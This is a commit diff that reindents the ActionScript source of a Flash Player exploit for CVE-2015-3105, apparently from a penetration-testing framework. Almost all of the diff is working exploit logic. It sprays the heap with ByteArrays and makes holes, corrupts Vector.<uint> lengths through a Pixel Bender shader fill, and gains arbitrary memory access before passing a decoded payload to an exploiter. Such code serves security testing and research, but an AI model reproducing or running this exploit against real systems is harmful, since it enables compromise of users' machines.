Fix indentation

jvazquez-r7 · jvazquez-r7 · commit e49c36998ca4 · 2015-06-25T14:12:23.000-05:00
diff --git a/external/source/exploits/CVE-2015-3105/Exploit.as b/external/source/exploits/CVE-2015-3105/Exploit.as
@@ -10,7 +10,7 @@ package
 
     public class Exploit extends Sprite
 	{
-		private var uv:Vector.<uint>
+        private var uv:Vector.<uint>
         private var canvas:Sprite
         private var filler_shader:Shader
         private var transformation_shader:Shader
@@ -45,7 +45,7 @@ package
             b64.decode(b64_payload)
             payload = b64.toByteArray()
             
-			canvas = new Sprite()
+            canvas = new Sprite()
             addChild(canvas)
             var size:uint = 400
 
@@ -57,71 +57,71 @@ package
                 
         private function do_exploit():void
         {
-			setup_shaders()
-			apply_shader_to_exploit()
-		}
+            setup_shaders()
+            apply_shader_to_exploit()
+        }
 		
-		private function setup_shaders():void
+        private function setup_shaders():void
         {
-			transformation_shader = new Shader(new TransformationPbj())
+            transformation_shader = new Shader(new TransformationPbj())
 			
-			ba_vector = new Vector.<Object>(ba_vector_length)
-			uint_vectors = new Vector.<Object>(uint_vectors_length)
+            ba_vector = new Vector.<Object>(ba_vector_length)
+            uint_vectors = new Vector.<Object>(uint_vectors_length)
 			
             // Initialize uint vectors
-			for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
-			{
-				uint_vectors[i] = new Vector.<uint>()
-			}
-		    
+            for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
+            {
+                uint_vectors[i] = new Vector.<uint>()
+            }
+
             // Allocate Byte Arrays
-			for(i = 0; i < ba_vector_length; i++) // 5000
-			{
-				ba_vector[i] = new ByteArray()
-				ba_vector[i].endian = "littleEndian"
-				ba_vector[i].length = ba_length // 0x2000
-				fill_byte_array(ba_vector[i], 0x35555555)
-				ba_vector[i].writeInt(0xbabefac0)
-				ba_vector[i].writeInt(0xbabefac1)
-				ba_vector[i].writeInt(i)
-				ba_vector[i].writeInt(0xbabefac3)
-			}
+            for(i = 0; i < ba_vector_length; i++) // 5000
+            {
+                ba_vector[i] = new ByteArray()
+                ba_vector[i].endian = "littleEndian"
+                ba_vector[i].length = ba_length // 0x2000
+                fill_byte_array(ba_vector[i], 0x35555555)
+                ba_vector[i].writeInt(0xbabefac0)
+                ba_vector[i].writeInt(0xbabefac1)
+                ba_vector[i].writeInt(i)
+                ba_vector[i].writeInt(0xbabefac3)
+            }
 			
-			// Make holes
-			for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
-			{
-				fill_byte_array(ba_vector[i], 0x37777777)
-				ba_vector[i].clear()
-				ba_vector[i] = null
-			}
+            // Make holes
+            for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
+            {
+                fill_byte_array(ba_vector[i], 0x37777777)
+                ba_vector[i].clear()
+                ba_vector[i] = null
+            }
 			
             // Setup shader
-			filler_shader = new Shader(new FillerPbj()) //test_bin.pbj 
-			filler_shader.data.point1.value = [top_middle.x, top_middle.y]
+            filler_shader = new Shader(new FillerPbj()) //test_bin.pbj 
+            filler_shader.data.point1.value = [top_middle.x, top_middle.y]
             filler_shader.data.point2.value = [bottom_left.x, bottom_left.y]
-			filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
-		}
+            filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
+        }
 		
-		final private function fill_byte_array(ba:ByteArray, value:int):void 
-		{
+        final private function fill_byte_array(ba:ByteArray, value:int):void 
+        {
             ba.position = 0
             var i:uint = 0
-			while (i < ba.length / 4)
-			{
-				ba.writeInt(value)
-				i = i + 1
-			}
+            while (i < ba.length / 4)
+            {
+                ba.writeInt(value)
+                i = i + 1
+            }
             ba.position = 0
             return
         }
 		
-		private function apply_shader_to_exploit():void
-		{	
-			try {
-				filler_shader.data.point3 = transformation_shader.data.positionTransformation27
-			} catch(err:Error) {
-				Logger.log("Error!")
-			}
+        private function apply_shader_to_exploit():void
+        {	
+            try {
+                filler_shader.data.point3 = transformation_shader.data.positionTransformation27
+            } catch(err:Error) {
+                Logger.log("Error!")
+            }
 			
             filler_shader.data.color1.value = [1, 1, 1, 1]
             
@@ -137,45 +137,45 @@ package
             var test:uint
             var mod_idx:uint = 0xffffffff
             for(var i:uint = 0; i< ba_vector_length; i++) { // 5000
-				if (ba_vector[i] != null) {
-					ba_vector[i].position = 32
-					test = ba_vector[i].readUnsignedInt()
-					if (test != 0x35555555) {
+                if (ba_vector[i] != null) {
+                    ba_vector[i].position = 32
+                    test = ba_vector[i].readUnsignedInt()
+                    if (test != 0x35555555) {
                         mod_idx = i
-						break
-					}
-				}
-			}
+                        break
+                    }
+                }
+            }
             
             if (mod_idx == 0xffffffff) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Modified ba not found... aborting")
                 return
             }
 			
-			// Clear the modified BA, we need a hole there =)
-			fill_byte_array(ba_vector[mod_idx], 0x39999999)
-			ba_vector[mod_idx].clear()
-			ba_vector[mod_idx] = null
-			
-			// Fill the BA space with well positioned Vector.<uint>'s, hopefully...
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				uint_vectors[i].length = 0x13e
-				uint_vectors[i][0] = 0xcccccccc
-				uint_vectors[i][1] = i
-				uint_vectors[i][2] = 0xaaaaaaaa
-			}
-			
+            // Clear the modified BA, we need a hole there =)
+            fill_byte_array(ba_vector[mod_idx], 0x39999999)
+            ba_vector[mod_idx].clear()
+            ba_vector[mod_idx] = null
+
+            // Fill the BA space with well positioned Vector.<uint>'s, hopefully...
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                uint_vectors[i].length = 0x13e
+                uint_vectors[i][0] = 0xcccccccc
+                uint_vectors[i][1] = i
+                uint_vectors[i][2] = 0xaaaaaaaa
+            }
+
             // Corrupt again, hopefully one of our vector lengths =)
             canvas.graphics.beginShaderFill(filler_shader)
 
             var corrupted:uint = 0xffffffff
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length != 0x13e) {
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                if (uint_vectors[i].length != 0x13e) {
                     corrupted = i
-					break 
-				}
+                    break 
+                }
 			}
 			
             if (corrupted == 0xffffffff) {
@@ -184,54 +184,54 @@ package
             }
 			
             var offset:uint = 0xffffffff
-			for(i = 0; i < 2048; i++)
-			{
-				if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc) 
-				{
-					uint_vectors[corrupted][i] = 0xffffffff
+            for(i = 0; i < 2048; i++)
+            {
+            	if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc) 
+            	{
+            		uint_vectors[corrupted][i] = 0xffffffff
                     offset = i
-					break
-				}
-			}
+            		break
+            	}
+            }
             
             if (offset == 0xffffffff) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector for manual corruption not found... aborting")
                 return
             }
 			
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length == 0xffffffff) {
-					uv = uint_vectors[i]
-					break 
-				}
-			}
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+            	if (uint_vectors[i].length == 0xffffffff) {
+            		uv = uint_vectors[i]
+            		break 
+            	}
+            }
             
             if (uv == null) {
                 Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector manually corrupted not found... aborting")
                 return
             }
 			
-			var my_offset:uint = 0x3ffffffe - offset - 2
-			uv[my_offset] = 0x13e
-            
+            var my_offset:uint = 0x3ffffffe - offset - 2
+            uv[my_offset] = 0x13e
+
             for(i = 0; i < ba_vector_length; i++) { // 5000
-				if (ba_vector[i] != null) {
-        			ba_vector[i].clear()
-        			ba_vector[i] = null
-				}
-			}
+                if (ba_vector[i] != null) {
+                    ba_vector[i].clear()
+                    ba_vector[i] = null
+                }
+            }
             
-			for(i = 0; i < uint_vectors_length; i++) // 70000
-			{
-				if (uint_vectors[i].length != 0xffffffff) {
+            for(i = 0; i < uint_vectors_length; i++) // 70000
+            {
+                if (uint_vectors[i].length != 0xffffffff) {
                     delete(uint_vectors[i])
-        			uint_vectors[i] = null
-				}
-			}
+                    uint_vectors[i] = null
+                }
+            }
             
             exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
-		}
+        }
 
     }
 }
